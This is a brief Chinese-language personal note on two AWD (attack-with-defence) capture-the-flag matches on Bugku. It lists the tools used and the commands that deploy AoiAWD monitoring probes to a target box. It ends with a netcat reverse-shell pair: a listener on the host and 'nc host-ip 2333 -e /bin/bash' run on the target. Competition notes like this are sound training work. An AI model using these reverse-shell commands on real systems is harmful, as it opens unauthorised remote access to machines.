bugku上打了两场awd,简单记录一下
winscp连上方便文件操作,tabby再开个ssh
Aoiawd上探针,将本机tmp文件夹里面探针扔到靶机上然后执行指令
chmod +x tapeworm.phar
chmod +x roundworm
chmod +x guardian.phar
./tapeworm.phar -d 目录 -s ip:port
./roundworm -w 目录 -s ip -p port
./guardian.phar -i 目录 -s ip:port
通常
./tapeworm.phar -d ../var/www/html -s ip:port
./roundworm -w ../var/www/html -s ip -p port
docker里面构建的Aoiawd的guardian用起来有点问题,一般情况evilPatcher能应付一下
搭建好后可以看记录,可以粗略判断危险处
主机开启端口监听:
nc -lvvp 2333
靶机反弹shell,已经拿道远端shell
nc 主机ip 2333 -e /bin/bash